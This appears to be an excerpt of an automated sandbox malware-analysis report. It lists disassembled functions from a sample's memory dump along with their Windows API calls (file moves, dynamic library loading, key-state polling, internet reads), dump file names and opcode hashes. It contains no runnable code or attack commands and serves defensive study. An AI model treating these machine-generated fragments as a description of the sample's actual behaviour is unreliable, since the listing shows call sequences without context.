                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 685ae5a664d48b497ef9b265414948ca3c37cc86b51eab416f3fa028f14108a8
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9a7f1a4a65adc7fe999710e624efaa1d123ad6ddaf7131194aa838b18c673aa5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 685ae5a664d48b497ef9b265414948ca3c37cc86b51eab416f3fa028f14108a8
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661A231208641EFD714DF14C590E6ABBE5FF84318F54859CF09A8B292DB31ED46CB91
                                                                                                                                                                                                                                                                                                    Function 00A7ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A7D7CD,?), ref: 00A7E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A7D7CD,?), ref: 00A7E72D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7EAB0: GetFileAttributesW.KERNEL32(?,00A7D840), ref: 00A7EAB1
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00A7ED8A
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00A7EDC3
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7EF02
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7EF1A
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A7EF67
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1740c2e5a1632960188378a88b9be3f6e3f792ee3e01729c52785d52c10c82f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: 755c14e6a070406f8cc9e764841660574dc80bc0a9bbd92a3e64e912d9e3cf95
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1740c2e5a1632960188378a88b9be3f6e3f792ee3e01729c52785d52c10c82f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD5165B25083459BC724DBA4DD819DBB3ECEF89340F40892EF589D3151EF71A688C766
                                                                                                                                                                                                                                                                                                    Function 00A79517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A79534
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00A795A5
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00A79604
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A79677
                                                                                                                                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A796A2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8296dacf6feff3a1426b3e5bf0929012fecb15af74575297cd41720184c1e8aa
                                                                                                                                                                                                                                                                                                    • Instruction ID: 950b27adc3dfcaa6880f0ae17662b2d139e23319da8b776e4139881232d47c84
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8296dacf6feff3a1426b3e5bf0929012fecb15af74575297cd41720184c1e8aa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7D513BB5A00619DFCB14CF58C884EAAB7F9FF89314B15855AE94ADB350E730E911CF90
                                                                                                                                                                                                                                                                                                    Function 00A89540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A895F3
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A8961F
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A89677
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A8969C
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A896A4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cafa115f2e6c36d0c951c203928ca0ced409f74fa23e472f2ce85a7835a859ce
                                                                                                                                                                                                                                                                                                    • Instruction ID: d265898b699dc6375f4573dfe1e6050df80577f783553f6741256b2bda3dc1d2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cafa115f2e6c36d0c951c203928ca0ced409f74fa23e472f2ce85a7835a859ce
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F513D35A002159FDB05DF65C981EAEBBF5FF49314F088058E849AB3A2DB35ED41CB90
                                                                                                                                                                                                                                                                                                    Function 00A99941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A9999D
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00A99A2D
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A99A49
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00A99A8F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00A99AAF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A81A02,?,7529E610), ref: 00A2F9F1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A70354,00000000,00000000,?,?,00A81A02,?,7529E610,?,00A70354), ref: 00A2FA18
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 780214bb14df5de7d1917e0d4b0c7c6f1a42057c85e52afa803908f55115dab6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1950b81081370c5e78c3d557a24632c918aea033b12763370b679c037538d7c9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 780214bb14df5de7d1917e0d4b0c7c6f1a42057c85e52afa803908f55115dab6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3516C35600205EFCB10DF68C4858AEBBF1FF09354B0481A8E80A9F762D731ED86CB91
                                                                                                                                                                                                                                                                                                    Function 00AA75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AA766B
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00AA7682
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AA76AB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A8B5BE,00000000,00000000), ref: 00AA76D0
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AA76FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4795ac40218f5626608280090c5a3846301252548c4443766354eed1516ea66c
                                                                                                                                                                                                                                                                                                    • Instruction ID: bfbd9fc43c5f03c7c7ba3612bf2c09e368e5ed37076225fcbce802e500e8527c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4795ac40218f5626608280090c5a3846301252548c4443766354eed1516ea66c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941D335A08504AFD729DF6CCC48FAEBBA5EB4B360F150224F859A72E1D770AD41DA50
                                                                                                                                                                                                                                                                                                    Function 00A423C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8e912e4e14d236a416f6af3eeacab0837ece535ff4919f8fc1120872652bca97
                                                                                                                                                                                                                                                                                                    • Instruction ID: 14b9b4c39989266e88927ff1d39df35c32c0c36158b8e3867be634b72073b8c3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e912e4e14d236a416f6af3eeacab0837ece535ff4919f8fc1120872652bca97
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB41CF36A002009FCB20DF78C981B5AB7F5EFC8314F5545A9F516EB395DA31AD02CB81
                                                                                                                                                                                                                                                                                                    Function 00A119CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A119E1
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00A119FE
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00A11A23
                                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00A11A3D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2f0dea1beb0384cc8177ca4dea291d714757a689d853b81caec25d2e30cc241e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3ad3343fa127589ae52adb3743c2c3659afe6e91dee004a252f6cc95ab7dbd87
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f0dea1beb0384cc8177ca4dea291d714757a689d853b81caec25d2e30cc241e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5417F71A0451ABFDF05DFA4C844AEEBB74FF45365F20831AE969A32D0C7306A94CB91
                                                                                                                                                                                                                                                                                                    Function 00A842B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00A84310
                                                                                                                                                                                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A84367
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00A84390
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00A8439A
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A843AB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 3135260665eba1f91d6ed301f965e3d2e368784f3dc1060f3375527b11183a50
                                                                                                                                                                                                                                                                                                    • Instruction ID: 377866dd487625f7fbc17c82dcf2a64f9bef21e1e40bfe1b23649bac95359c2a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3135260665eba1f91d6ed301f965e3d2e368784f3dc1060f3375527b11183a50
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D31B770904387DFEB34EBB4D888BB63BACEB09304F044569D4A2CE1A1E7A49446CF21
                                                                                                                                                                                                                                                                                                    Function 00A7224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00A72262
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00A7230E
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00A72316
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00A72327
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A7232F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fb9071032850d4511fd25a6ded916ef6f106ecec05974b7d24139e13af297fbc
                                                                                                                                                                                                                                                                                                    • Instruction ID: c09688e03a0f2bc0407d540a7cc0b2ea13e85d6732c706bf2173df8605493464
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb9071032850d4511fd25a6ded916ef6f106ecec05974b7d24139e13af297fbc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1731C271900219EFDB14CFA8CD89BDE3BB5EB05315F108225F966AB2D1C770D944DB90
                                                                                                                                                                                                                                                                                                    Function 00A8D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8D97D
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00A8D9B4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8D9F9
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8DA0D
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00A8CC63,00000000), ref: 00A8DA37
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 233648e58c006000dabf9c9d2a2d30567cb46a0183feb4a764cf602fb073ea7f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 75bd097d97760ebfe8a9421fb4e70865f484ebe0c0b0e39eb3b1a50bc72beea8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 233648e58c006000dabf9c9d2a2d30567cb46a0183feb4a764cf602fb073ea7f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52313C71504205EFDB24EFA6D885EAFBBF8EB05354B20442EF546D2590DB70EE41DB60
                                                                                                                                                                                                                                                                                                    Function 00AA61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AA61E4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AA623C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA624E
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA6259
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA62B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
